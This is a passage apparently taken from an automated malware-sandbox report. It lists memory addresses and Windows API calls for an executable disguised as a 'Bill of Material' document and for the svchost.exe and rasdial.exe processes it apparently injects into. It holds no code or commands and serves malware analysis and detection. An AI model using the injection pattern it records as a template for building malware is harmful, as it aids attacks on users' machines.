            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2FE0 NtCreateFile,LdrInitializeThunk,6_2_047A2FE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2FB0 NtResumeThread,LdrInitializeThunk,6_2_047A2FB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2AF0 NtWriteFile,LdrInitializeThunk,6_2_047A2AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2AD0 NtReadFile,LdrInitializeThunk,6_2_047A2AD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2B60 NtClose,LdrInitializeThunk,6_2_047A2B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_047A2BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_047A2BE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_047A2BA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A35C0 NtCreateMutant,LdrInitializeThunk,6_2_047A35C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A39B0 NtGetContextThread,LdrInitializeThunk,6_2_047A39B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2C00 NtQueryInformationProcess,6_2_047A2C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2CF0 NtOpenProcess,6_2_047A2CF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2CC0 NtQueryVirtualMemory,6_2_047A2CC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2D00 NtSetInformationFile,6_2_047A2D00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2DB0 NtEnumerateKey,6_2_047A2DB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2E30 NtWriteVirtualMemory,6_2_047A2E30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2EA0 NtAdjustPrivilegesToken,6_2_047A2EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2F60 NtCreateProcessEx,6_2_047A2F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2FA0 NtQuerySection,6_2_047A2FA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2F90 NtProtectVirtualMemory,6_2_047A2F90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2AB0 NtWaitForSingleObject,6_2_047A2AB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A2B80 NtQueryInformationFile,6_2_047A2B80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A3010 NtOpenDirectoryObject,6_2_047A3010
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A3090 NtSetValueKey,6_2_047A3090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A3D70 NtOpenThread,6_2_047A3D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A3D10 NtOpenProcessToken,6_2_047A3D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_00828DA0 NtCreateFile,6_2_00828DA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_00828FF0 NtDeleteFile,6_2_00828FF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_00828F00 NtReadFile,6_2_00828F00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_00829090 NtClose,6_2_00829090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_008291E0 NtAllocateVirtualMemory,6_2_008291E0
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0039D5EB
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00391201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00391201
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0039E8F6
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0033BF400_2_0033BF40
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003380600_2_00338060
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A20460_2_003A2046
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003982980_2_00398298
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0036E4FF0_2_0036E4FF
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0036676B0_2_0036676B
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003C48730_2_003C4873
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0035CAA00_2_0035CAA0
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0033CAF00_2_0033CAF0
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0034CC390_2_0034CC39
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00366DD90_2_00366DD9
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0034B1190_2_0034B119
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003391C00_2_003391C0
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003513940_2_00351394
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0035781B0_2_0035781B
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003379200_2_00337920
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0034997D0_2_0034997D
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00357A4A0_2_00357A4A
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00357CA70_2_00357CA7
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003BBE440_2_003BBE44
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00369EEE0_2_00369EEE
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_013835F00_2_013835F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183632_2_00418363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010CF2_2_004010CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010D02_2_004010D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029ED2_2_004029ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029F02_2_004029F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012802_2_00401280
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC7B2_2_0040FC7B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC832_2_0040FC83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165432_2_00416543
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E902_2_00402E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FEA32_2_0040FEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E7432_2_0042E743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF232_2_0040DF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F02_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039003E62_2_039003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA3522_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C02C02_2_038C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E02742_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F41A22_2_038F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039001AA2_2_039001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F81CC2_2_038F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038301002_2_03830100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA1182_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C81582_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D20002_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C02_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038647502_2_03864750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038407702_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C6E02_2_0385C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039005912_2_03900591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038405352_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EE4F62_2_038EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E44202_2_038E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F24462_2_038F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F6BD72_2_038F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB402_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA802_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A02_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390A9A62_2_0390A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038569622_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038268B82_2_038268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E8F02_2_0386E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A8402_2_0384A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038428402_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BEFA02_2_038BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC82_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384CFE02_2_0384CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03882F282_2_03882F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860F302_2_03860F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E2F302_2_038E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4F402_2_038B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852E902_2_03852E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FCE932_2_038FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEEDB2_2_038FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEE262_2_038FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840E592_2_03840E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03858DBF2_2_03858DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383ADE02_2_0383ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384AD002_2_0384AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DCD1F2_2_038DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0CB52_2_038E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830CF22_2_03830CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840C002_2_03840C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0388739A2_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F132D2_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D34C2_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A02_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C02_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B1B02_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387516C2_2_0387516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F1722_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B16B2_2_0390B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF0CC2_2_038EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C02_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F70E92_2_038F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF0E02_2_038FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF7B02_2_038FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC2_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038856302_2_03885630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DD5B02_2_038DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039095C32_2_039095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F75712_2_038F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF43F2_2_038FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038314602_2_03831460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FB802_2_0385FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B5BF02_2_038B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387DBF92_2_0387DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFB762_2_038FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DDAAC2_2_038DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03885AA02_2_03885AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E1AA32_2_038E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EDAC62_2_038EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFA492_2_038FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7A462_2_038F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B3A6C2_2_038B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D59102_2_038D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038499502_2_03849950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B9502_2_0385B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038438E02_2_038438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD8002_2_038AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841F922_2_03841F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFFB12_2_038FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03803FD22_2_03803FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03803FD52_2_03803FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFF092_2_038FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03849EB02_2_03849EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FDC02_2_0385FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843D402_2_03843D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F1D5A2_2_038F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7D732_2_038F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFCF22_2_038FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B9C322_2_038B9C32
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0481E4F66_2_0481E4F6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048144206_2_04814420
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048224466_2_04822446
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048305916_2_04830591
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047705356_2_04770535
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0478C6E06_2_0478C6E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047707706_2_04770770
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047947506_2_04794750
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0476C7C06_2_0476C7C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048020006_2_04802000
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048241A26_2_048241A2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047F81586_2_047F8158
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048301AA6_2_048301AA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048281CC6_2_048281CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047601006_2_04760100
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0480A1186_2_0480A118
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047F02C06_2_047F02C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048102746_2_04810274
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048303E66_2_048303E6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0477E3F06_2_0477E3F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482A3526_2_0482A352
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04810CB56_2_04810CB5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04770C006_2_04770C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04760CF26_2_04760CF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0477AD006_2_0477AD00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0476ADE06_2_0476ADE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0480CD1F6_2_0480CD1F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04788DBF6_2_04788DBF
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482CE936_2_0482CE93
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04770E596_2_04770E59
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482EEDB6_2_0482EEDB
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482EE266_2_0482EE26
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04782E906_2_04782E90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047E4F406_2_047E4F40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04790F306_2_04790F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047B2F286_2_047B2F28
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0477CFE06_2_0477CFE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04812F306_2_04812F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04762FC86_2_04762FC8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047EEFA06_2_047EEFA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047728406_2_04772840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0477A8406_2_0477A840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0479E8F06_2_0479E8F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047568B86_2_047568B8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047869626_2_04786962
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0483A9A66_2_0483A9A6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047729A06_2_047729A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0476EA806_2_0476EA80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04826BD76_2_04826BD7
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482AB406_2_0482AB40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047614606_2_04761460
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482F43F6_2_0482F43F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0480D5B06_2_0480D5B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048395C36_2_048395C3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048275716_2_04827571
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047B56306_2_047B5630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048216CC6_2_048216CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482F7B06_2_0482F7B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0481F0CC6_2_0481F0CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482F0E06_2_0482F0E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048270E96_2_048270E9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047770C06_2_047770C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0475F1726_2_0475F172
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047A516C6_2_047A516C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0477B1B06_2_0477B1B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0483B16B6_2_0483B16B
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048112ED6_2_048112ED
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0478B2C06_2_0478B2C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047752A06_2_047752A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0475D34C6_2_0475D34C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482132D6_2_0482132D
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047B739A6_2_047B739A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047E9C326_2_047E9C32
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482FCF26_2_0482FCF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04773D406_2_04773D40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0478FDC06_2_0478FDC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04821D5A6_2_04821D5A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04827D736_2_04827D73
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04779EB06_2_04779EB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482FFB16_2_0482FFB1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482FF096_2_0482FF09
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04733FD26_2_04733FD2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04733FD56_2_04733FD5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04771F926_2_04771F92
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047DD8006_2_047DD800
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047738E06_2_047738E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047799506_2_04779950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0478B9506_2_0478B950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_048059106_2_04805910
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047E3A6C6_2_047E3A6C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04811AA36_2_04811AA3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0480DAAC6_2_0480DAAC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0481DAC66_2_0481DAC6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04827A466_2_04827A46
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482FA496_2_0482FA49
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047B5AA06_2_047B5AA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047ADBF96_2_047ADBF9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047E5BF06_2_047E5BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0482FB766_2_0482FB76
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0478FB806_2_0478FB80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_00811BF06_2_00811BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0080CB686_2_0080CB68
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0080CB706_2_0080CB70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0080CD906_2_0080CD90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0080AE106_2_0080AE10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_008152506_2_00815250
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_008134306_2_00813430
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0082B6306_2_0082B630
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_045CD7786_2_045CD778
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_045CE70C6_2_045CE70C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_045CE2586_2_045CE258
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_045CE3736_2_045CE373
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047A5130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047EF290 appears 105 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047DEA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 0475B970 appears 280 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047B7E54 appears 111 times
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: String function: 00339CB3 appears 31 times
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: String function: 0034F9F2 appears 40 times
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: String function: 00350A30 appears 46 times
